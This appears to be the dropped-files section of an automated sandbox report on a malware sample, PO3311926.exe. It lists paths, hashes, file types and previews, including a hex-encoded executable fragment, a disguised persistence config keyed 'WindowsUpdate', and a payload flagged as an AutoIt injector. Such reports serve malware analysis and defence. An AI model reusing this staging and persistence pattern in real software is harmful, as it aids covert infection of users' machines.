Preview:	mXks05Af07055jf305e7892HK8dKhepY26Yts80129m17o32843r51h686X31CpxYAUz71miu9Y933547322H1..ToolTipConstants GuiDateTimePicker..H1D06b72CG3o9DXDR56..ToolbarConstants UpDownConstants..Z95P8fzY4648mR04693B4F6Nl61Mi7Ax30F62VEG7i03NuCC35PN01J57472jbr265w..ColorConstants ComboConstants..dJfbCN1G6566..StructureConstants ToolbarConstants..1NUAeV329P9lEKk6sVKh83AX6soVS15o3f646d8wub22671dQYkSSBW7494ut1a42ukf5j..ToolTipConstants TreeViewConstants..0w8B07LDb6R5C00L9P937rkZ9x45wdh869c82833io0Bu1782x4V10963aX17R882u6Af580V63heC..ColorConstants ComboConstants..

C:\Users\user\AppData\Local\Temp\RarSFX0\xjcp.hrp

Download File

Process:	C:\Users\user\Desktop\PO3311926.exe
File Type:	ASCII text, with very long lines (65536), with no line terminators
Category:	dropped
Size (bytes):	71001
Entropy (8bit):	3.7357586345067477
Encrypted:	false
SSDEEP:	1536:e7sXNaRjSktuowGPaZB8solGHYAfBPkh3DdfUl+m:wjeuhxo
MD5:	B71D8744631044A291DB10AC6A953946
SHA1:	B840F5047D6706B1A552963A25F0CC09F11DEAD9
SHA-256:	CC5EEBA6859999452AD8FCB224D6B75B127721B26A07EFB640A81015A674E1F7
SHA-512:	1D4599F27557ADE4D233E694026373F72A149C9C84C23E70EC3246AED2FEB2B345FF8BC3EB0DBE8536D03F9F8C5B4F9AC147B1595CDB89AE53F870FEDA5DA074
Malicious:	false
Preview:	0x4D59]]3]]]04]]]FFFF]]_8]]]]]]]4]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]08]]]]E/F_0E]_409CD2/_80/4CCD2/546869732070726F67726/6D20636/6E6E6F742062652072756E20696E20444F53206D6F64652E0D0D024]]]]]]]5045]]4C0/03]ED64266]]]]]]]]E]]20/0_0/0_]]9]]]08]]]]]]FE_7]]]2]]]0C]]]]04]]02]]]]2]]04]]]]]]]04]]]]]]]]]0/]]02]]]]]]02]4085]]/]]0/]]]]0/]]0/]]]]]]0/]]]]]]]]]]]08_7]]53]]]]C]]0E]4]]]]]]]]]]]]]]]]]]]E]]]C]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]2]]]8]]]]]]]]]]]082]]048]]]]]]]]]]]2E74657874]]]0498]]]2]]]09]]]02]]]]]]]]]]]]]]2]]0602E72737263]]]E]4]]]C]]]]6]]]9C]]]]]]]]]]]]]]4]]0402E72656C6F63]]0C]]]]E]]]]2]]]2]]]]]]]]]]]]]]4]]042]]]]]]]]]]]]]]]]E0_7]]]]]]48]]]02]05]_C7/]]EC45]]0/]]]/4]]06]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]/E02280/]]02/E022804]]0267306]]08]/]]047307]]08]2]]047308]]08]3]]047309]]08]4]]042]]/33]/]0F]]]0/]]//7E0/]]046F0]]002_]062]/33]/]0F]]]02]]//7E02]]046F0_]]002_]062]/33]/]0F]]]03]]//7E03]]046F0C]]002_]062]/33]/]0F]]]04]]//7E04]]046F0D]

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnk

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Mon Apr 29 08:36:38 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
Category:	dropped
Size (bytes):	2677
Entropy (8bit):	3.9787797233856486
Encrypted:	false
SSDEEP:	48:8v0dHTf/GH+idAKZdA1oehwiZUklqehgy+3:8vAje3y
MD5:	A97C8268289D5B3A103996D91585D450
SHA1:	5482567B1F993A78A185900E730128972FA1D9D5
SHA-256:	546AFC762FA6D047CD8CF618905223F775F6AFD64C886A083AC9C94F686DB56A
SHA-512:	FCEB71A6C878DC1E6408AEF569EA80B2DA5691993CCBF0676E6D306D7025FA0EF115811D05BDAB148608C8CFFEBFED05661B8D8AFF852CD4EA49F30194DC040D
Malicious:	false
Preview:	L..................F.@.. ...$+.,....j......N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....EW)C..PROGRA~1..t......O.I.X.L....B...............J.....V...P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.X.L....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.X.L....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.X.L..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V.X.L...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............n.......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnk

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Mon Apr 29 08:36:38 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
Category:	dropped
Size (bytes):	2679
Entropy (8bit):	3.995710336924251
Encrypted:	false
SSDEEP:	48:8g0dHTf/GH+idAKZdA1leh/iZUkAQkqehny+2:8gAjc9QKy
MD5:	110EB60959FB6A13E9993D494B045966
SHA1:	774E4DB10AF4150BBF3784B144793083BBF389A0
SHA-256:	F296D5D44B01B8258AF8D0C165CA7777A0D504BCE34E3594CEBC4EF6867DF07A
SHA-512:	8CAFFFA4A9821CAD45D5AFCF1B679E2BBB4AAD2B1BF81E7D26C7D929BD3576637C9361F70B2EF7073A5C5FCE02A0C014D914D561BAB84A1C23D303A56BA66C2F
Malicious:	false
Preview:	L..................F.@.. ...$+.,....e......N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....EW)C..PROGRA~1..t......O.I.X.L....B...............J.....V...P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.X.L....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.X.L....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.X.L..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V.X.L...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............n.......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnk

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Thu Oct 5 07:00:51 2023, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
Category:	dropped
Size (bytes):	2693
Entropy (8bit):	4.006044622396717
Encrypted:	false
SSDEEP:	48:820dHTf/bH+idAKZdA14t5eh7sFiZUkmgqeh7sBy+BX:82Ajznzy
MD5:	0DE1D4E28354346DC77C65FCE1B5DF6A
SHA1:	00FF27F91D05428628F4FECE773FB6D36CEA0C45
SHA-256:	266EBB2A0C8F1D6399216D32F03FF7CC0E3B1FA31E6DCE88EAFDEA34255694C5
SHA-512:	A4FBCAC313AC3E6018045A2EA409B1AAD4234F9EFB418461EFCA2410ED79DA7054D1882423F0B5598C43ACC11B5831D978E3F877F45EBF1DF3B62B03FF1403D8
Malicious:	false
Preview:	L..................F.@.. ...$+.,.....C..b...N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....EW)C..PROGRA~1..t......O.I.X.L....B...............J.....V...P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.X.L....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.X.L....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.X.L..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VEW.@...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............n.......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnk

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Mon Apr 29 08:36:38 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
Category:	dropped
Size (bytes):	2681
Entropy (8bit):	3.9943443763286113
Encrypted:	false
SSDEEP:	48:8Q0dHTf/GH+idAKZdA16ehDiZUkwqehby+R:8QAj3py
MD5:	75C58D944170F8BA21CD6EDAC1FE52A3
SHA1:	CF4BAFEA16A11521E0E00EDC538E6AD33B094D79
SHA-256:	40A3A60235C0BEC2D1C1061FAE31073B912194101B18911C5DF775D11C5B8C2C
SHA-512:	BF0AABD11351C8D6E97841A475B9EFA87693E4592713804040FBE702EC245BD3BA213E822115A65CF172A503FB99573FAD17BBE201E3E4331DA8054468B1CA76
Malicious:	false
Preview:	L..................F.@.. ...$+.,....vE.....N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....EW)C..PROGRA~1..t......O.I.X.L....B...............J.....V...P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.X.L....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.X.L....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.X.L..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V.X.L...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............n.......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnk

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Mon Apr 29 08:36:38 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
Category:	dropped
Size (bytes):	2681
Entropy (8bit):	3.981044695446285
Encrypted:	false
SSDEEP:	48:8w0dHTf/GH+idAKZdA1UehBiZUk1W1qehty+C:8wAjn9Ny
MD5:	ECE7014EB8AAD876FA67B69B659B2DF3
SHA1:	04191585C41959B414C7EB563476EF001DC1ED78
SHA-256:	CE74F86BB000904D5DFDC2F9374F7928F80BD478579374BF45F903075D1B9846
SHA-512:	6E3A0E0D31C891076B4AC65E5783EAB3A98446F72B250D75F5073BD4F571C217B28B220465F62B1262F1C35451A8E9F1DE72DD5BDC61DA47F0874BCB5F875D84
Malicious:	false
Preview:	L..................F.@.. ...$+.,....cs.....N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....EW)C..PROGRA~1..t......O.I.X.L....B...............J.....V...P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.X.L....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.X.L....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.X.L..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V.X.L...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............n.......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnk

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Mon Apr 29 08:36:38 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
Category:	dropped
Size (bytes):	2683
Entropy (8bit):	3.9959969454489226
Encrypted:	false
SSDEEP:	48:8w0dHTf/GH+idAKZdA1duTrehOuTbbiZUk5OjqehOuTbzy+yT+:8wAjwTYTbxWOvTbzy7T
MD5:	16892E71F4614771AF81D5322818FD88
SHA1:	60E6241236D4428DE76F9CFD7B0B1160F71063AB
SHA-256:	A1B5DD5DA0C5590DC4C61EFFC4AF3602B399E40FE3B81A90F05DCF3D45D64AB8
SHA-512:	A195B5C8059C99D3D5F09EE400F89FF4390EF7D75CA1F5CA32C308569C59FD3572810B422A9AB676ACF184AFC85F38A509BCBCF8CA1E7678A1B8F2538CEED139
Malicious:	false
Preview:	L..................F.@.. ...$+.,...........N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....EW)C..PROGRA~1..t......O.I.X.L....B...............J.....V...P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.X.L....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.X.L....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.X.L..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V.X.L...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............n.......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

C:\Users\user\AppData\Roaming\RegSvcs.exe

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
File Type:	PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	45984
Entropy (8bit):	6.16795797263964
Encrypted:	false
SSDEEP:	768:4BbSoy+SdIBf0k2dsjYg6Iq8S1GYqWH8BR:noOIBf0ddsjY/ZGyc7
MD5:	9D352BC46709F0CB5EC974633A0C3C94
SHA1:	1969771B2F022F9A86D77AC4D4D239BECDF08D07
SHA-256:	2C1EEB7097023C784C2BD040A2005A5070ED6F3A4ABF13929377A9E39FAB1390
SHA-512:	13C714244EC56BEEB202279E4109D59C2A43C3CF29F90A374A751C04FD472B45228CA5A0178F41109ED863DBD34E0879E4A21F5E38AE3D89559C57E6BE990A9B
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0% Antivirus: Virustotal, Detection: 0%, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....<.]..............0..d..........V.... ........@.. ..............................s.....`.....................................O.......8............r...A.......................................................... ............... ..H............text...\c... ...d.................. ..`.rsrc...8............f..............@..@.reloc...............p..............@..B................8.......H........+...S..........\|...P...........................................r...p(....2.(....(....z..r...p(....(....(......}......{.....s..........0..{...........Q.-.s.....+i~....o....(.....s.......o.....r!..p..(....Q.P,:.P.....(....o....o ........(....o!...o".....,..o#...t........0..(....... ....s$........o%....X..(....-...o&....0...........('......&.........................0...........(.......&.....*.................0............(.....(....~....,.(....~....o....9]...

C:\Users\user\temp\wgsr.msc

Download File

Process:	C:\Users\user\AppData\Local\Temp\RarSFX0\sdadbtvsh.bin
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	89
Entropy (8bit):	4.880158225201859
Encrypted:	false
SSDEEP:	3:YRRvuf1lXhONvkY9JlC9hRGdYkI4iz7NLHKovn:AvgDO9kcoGpIZJzzv
MD5:	C770990E69B3887C7FFEB4D2E6897E99
SHA1:	9584FD23A5694548D6D678A98044441AB2EF4EB1
SHA-256:	B2C49B81F942B5215952235E1B2C60CEDD4D48CAFEC061312C0B38294FD5BD01
SHA-512:	7C0B930BDADBB634A8D93F4DF4BE7A562EAEAF850539097E15A2FB499D199CCB775562930A20092976DFAD56BC6F38BC81A780CD01A4592981173F624A99003A
Malicious:	false
Preview:	[S3tt!ng]..stpths=%userprofile%..Key=WindowsUpdate..Dir3ctory=wrse..ExE_c=sdadbtvsh.bin..

C:\Users\user\wrse\aijs.docx

Download File

Process:	C:\Users\user\AppData\Local\Temp\RarSFX0\sdadbtvsh.bin
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	520
Entropy (8bit):	5.499830456903425
Encrypted:	false
SSDEEP:	12:ZvPW4AywqRWqrOGaUWPcjKGU7WufGk3BPydz7mVMmOl:ZvO4AyPWgOGbKLSufGk3QZ7Hm+
MD5:	9C20E4DBC8B06339684813411E0EBAE9
SHA1:	33576982CF29C18EF4E32A0B7E75981FD420656C
SHA-256:	6FEF2EE6CEABF623D208AEE66EE8A97FB381C0542106E0573E5F35FF15F929AE
SHA-512:	30559525DB0A8DA52AE117169C82FA6A81FCF1320207F04EB8090AC4D84C62630A1A1E81880A13BDA998F898A9E15C107E855CC8FA3FB0741D82570A01199F8C
Malicious:	false
Preview:	fxL2sfn147y8n3k8pvwl854e36W8v2ymc6t4N41K5I8f1..DateTimeConstants StructureConstants..FbMU7GFuNIP2U57uJEe4520GywIF9687371Lu7k44Fru36Lw2F..StructureConstants ToolTipConstants..g555Ux8yN4097E1vp8BjX5N42287268rwJhn2WW8ih6WxUFbX4556d79g67JvW4664307712X39uz12VC226vNQp285s3Zo6924g6JdlhCdiFGbd40L894B9684F60A69756u3532503M2A4pE..ColorConstants TreeViewConstants..9Fg529a..FileConstants FileConstants..upb868026PTA92850z5y458PPt0lnWW9Zb52b2975Iv6xLVX8S0i1Q9c5h8L5v87oF9919y37Us5T36j231rdStq4z4Q..UpDownConstants ColorConstants..

C:\Users\user\wrse\cqeg.bmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\RarSFX0\sdadbtvsh.bin
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	578
Entropy (8bit):	5.470929431536943
Encrypted:	false
SSDEEP:	12:QmrVWRQ13GEhjNiTP9RAHcNDJMT5WUzMTdWNe/jeubmnB9u:Q4WRQ13GEBNijicNDJS7cdWYLeuC2
MD5:	6E0C9DF3739A1E85F2F4D0A7F9EB2CCB
SHA1:	662EB231AD68AC60CD49BFE70001693511F605FD
SHA-256:	305E8EF070FF770300A914B1CF5B1496966DF70189471F538BDC88FD6956204D
SHA-512:	8466D8335765CD7EE5189CA90BF3FD820CBFA2CDF1041370200A5C7C8F7856540798C7B83AE44299AD517DC83B79AABBEA172A90346D15EB9FC09449F6A3E16E
Malicious:	false
Preview:	32CK95RY0814hv941T7k4iDeF..FontConstants FileConstants..64V81Fy4y81413I3L5VD9Z8R281FOL93245K2w699i15A8VJWP729qU14121O4..TreeViewConstants StructureConstants..8l8b835bP14P09H5586985r91iv96zgie11ein93l52223N3A1lN4l3HDO7R2waLs23lWD1I079aL0aWAL45ir06838uk4o72K80RNN3Q6n6o30..BorderConstants FileConstants..967jjg6Z7NxnB8Of2244549aCW1751Z9wPl4C03955N9AhB9mTUPta6KYZKo8Y2886c851T78016928X3a749n2xdYL72m3gMim4cH6c243Ptx683g30o8HeHc613y0FV..BorderConstants GuiDateTimePicker..B659447925ju61F0nsx470ry35T8CAmK3UTd9Ot6H9ce5xcFF1W246k7025595g4c6i2t572Qc6..BorderConstants ButtonConstants..

C:\Users\user\wrse\ensfhqoc.dat

Download File

Process:	C:\Users\user\AppData\Local\Temp\RarSFX0\sdadbtvsh.bin
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	507
Entropy (8bit):	5.563974152435707
Encrypted:	false
SSDEEP:	12:lXVPiyMsfK8BPpSX2Qny/RHw64FaERiBoeUQXn8:HXi8va9nzla4iBNR8
MD5:	4780805307EC0CCA7AB5C03C0FE32B6A
SHA1:	CCBF8B62C820CA937CC16D2C9ED96284086F9DE6
SHA-256:	3CD1C08B7401ECA53AC3DEEDFC1102D9FF1AE21B028CA7E588CD20DDBD3EB447
SHA-512:	E1F016BF6DFD31579F98E007E6BBAD9D4552478D7A9CD99521E534C2A21BD4590263CA57E6DF1C65F958C7448B2F9D8C877AE9970FCB9CDD596FCD2F0BA06997
Malicious:	false
Preview:	7x4i39U1577T9c980g98v9S3m9846B290uk70Y163393RDZ4IQj1967w3LIH7b9011w561jM..FontConstants TreeViewConstants..4q4SrH1896X8r978v8J7r4jcLvGv556A7Vo8Vr3104cLVF1c074auW8o3z708Dsa490A5Qm0408ka30ey6x72zU58nyx8qF1233Cn5bp7wnq16g..StructureConstants FileConstants..5W91U6etd85cO1O75kq2opx91R3Nv45FN6HUF658652R4LUwn6zILeh6P75644mMAs8u091wcTk195618FKJ70Zg36H140MIhR..ButtonConstants UpDownConstants..VP3OmSU4GdSB863C9h6U54W285384k1GQ64b5Z8R0Kh273R7O6L1WF9Zn112FcUE7Y0d3m14gl11aT928jJ..ToolTipConstants ToolTipConstants..

C:\Users\user\wrse\nngqrvwq.xl

Download File

Process:	C:\Users\user\AppData\Local\Temp\RarSFX0\sdadbtvsh.bin
File Type:	data
Category:	dropped
Size (bytes):	77764244
Entropy (8bit):	6.953358239636248
Encrypted:	false
SSDEEP:	98304:d3WyIsyX65fO/lWSP3c88U8OFoLI/D/S5E4xZ6x23CXOx5SVUkpS+8+a+QM9JHcN:T
MD5:	9ED200FBFBB5AD31F672F02841A6A5F0
SHA1:	B13CBC45CA0043F0D7B3404AEEFCC0F486578B99
SHA-256:	18DBA9188C29CB03FA1C641C96E92083D2D678A71A69C506692DFB7DFCB85058
SHA-512:	9599F7D024D507A7D88A5B9A4899EEAC3BE78E257EC86591B3FF8D588826C80C35D7C874078EC19489EA1EAC440538483E655777B3E6D540543A72741EE7E416
Malicious:	true
Yara Hits:	Rule: JoeSecurity_AutoitInjector, Description: Yara detected Autoit Injector, Source: C:\Users\user\wrse\nngqrvwq.xl, Author: Joe Security
Preview:	..;...wY.d.p#...4-...j-1..:5X..c5.`....#.c.s......6VJ....F..L. K[..R.g......*../.....I....z...;..q..o..N...9.s..\..+.C.JN&...^.Q~n$g...\|[.o.Y`. '.6?i..m...T_.....4Ca..rf./K.......D.<.O.Y..H".H.....[.9<.....K#FU<0..K....5.4.w.Y.7.3.4.....x.7.q.5.T.0.5.1.4.g.s.2.D.v.3.3.x.v.8.1.2.9.w.g.7.q.8.8.F.i.2.5.P.6.g.4.t.5.B.j.s.8.7.6.8.....G..I.3...g.F^;M,.6f..F....<S.Z.........'....0..).4..t..:D"{..'l..!.p...z.GVD.~...BPgB.)g.$.........W....'Z.q%;..i....+..\{W..e.f...HB..?.!y....A^8..gX..E}..a...K.Ao.Kp.s.A.....5.5.x.f.1.6.1.0.T.U.5.0.B.2.8.S.G.1.6.8.0.k.A.l.3.0.0.P.Y.f.j.d.8.3.7.....Z.c.8.V.2.6.4.o.5.1.H.5.....2.b.2.R.4.9.7.2.6.Q.V.U.1.7.6.0.H.G.2.F.7.u.f.4.p.C.X.5.7.3.9.6.7.t......%.Rd.......4}~...:.[.T.q...."7.H=z..........C.m.........#kQD.RE{.6.Wbv.....$...].../....#..1...ZW...?.J.D...O=.iy.0L....1...I.Y..84dm.......\|4bc9..a...t.C;;.G.GP.-.=8.r.......}...-..8.......sW..F....V8.....9'F..#.d.u....J..>3f.T.....O...XQ.Q.....`...0......y4..._d7._.u...+.Y.....p.;

C:\Users\user\wrse\oahtefaij.docx

Download File

Process:	C:\Users\user\AppData\Local\Temp\RarSFX0\sdadbtvsh.bin
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	541
Entropy (8bit):	5.500713602675913
Encrypted:	false
SSDEEP:	12:L2PI9CSDd6C6hRVZfqNCaqJ8fIHuCk89QpKoWVkjPc:LH9fDd61XICaqQv8h1L
MD5:	C19B7228B00C62EC73D9D397A8D5411C
SHA1:	2602C88A1B59809A3100FAB34B09ABD8AA49357E
SHA-256:	A43EF991601F3F4BB4BCCCECC42F7EE138E3ADB9E1AB8986D15AE5FFE9CFCACA
SHA-512:	87860E453841667CE5FDE333B0D08E1AFBE8335BEA1551B8A77D4EAE4B5C467F43D74F08C96F95BD4893AEF029CA980A46EC031316D565E98F2434D69AF757E7
Malicious:	false
Preview:	3M8M129O40l96BLx57e7yT62w9O91i..TreeViewConstants BorderConstants..r6A4x792ipG20564Y0278dSU41dP6ty16Mo71X71So7e4XYe2yqLL27n1810H31L20wv2l1a3880bSsgMh32OBBmEy2xs0..DateTimeConstants FontConstants..0h11d68252o149HV81gXG4aKAt272YA96s06VX8fFN33988..StructureConstants GuiDateTimePicker..83Kd31EQ8M72d55lt0FCD4G07K54hIiW3xI92855R8IoT4Q292Yro5sm5aI43oO75874hlU05r517ibw5b9tY8465N9T861Pj3..FontConstants FontConstants..3O9675zw751VS30D7X5y8pq1p393ct0302N6e0r4tL6YpS6Eo392757S97422723Hu1a5785R23874o9kFMMY0K6oc..GuiDateTimePicker TreeViewConstants..

C:\Users\user\wrse\oewmscssx.xl

Download File

Process:	C:\Users\user\AppData\Local\Temp\RarSFX0\sdadbtvsh.bin
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	596
Entropy (8bit):	5.463054222617093
Encrypted:	false
SSDEEP:	12:rXyQ220lRsKYT7N+cMoaZt9MjVueBP0yMA6cFKwfCcK6vsRc:zyBPMF+HZt9MjQemZA6ceyuc
MD5:	932B923E6BBACB25F75103B5E1340469
SHA1:	8A7933302671AC0AD727408DF4C9E233F0EAC1C0
SHA-256:	AA374071E60CB09D2D90D2ABAF4707D93C1D4A0EE8DADE5706326F0C934EA43A
SHA-512:	6848C73602601072D9017595EB43AB9BBADAA02B9C3B00945A2A258DFC24532E2B93664F0852F989DAFBA5ABE38922847BFAB3D8E4A6A4E234531D4C9E3813C0
Malicious:	false
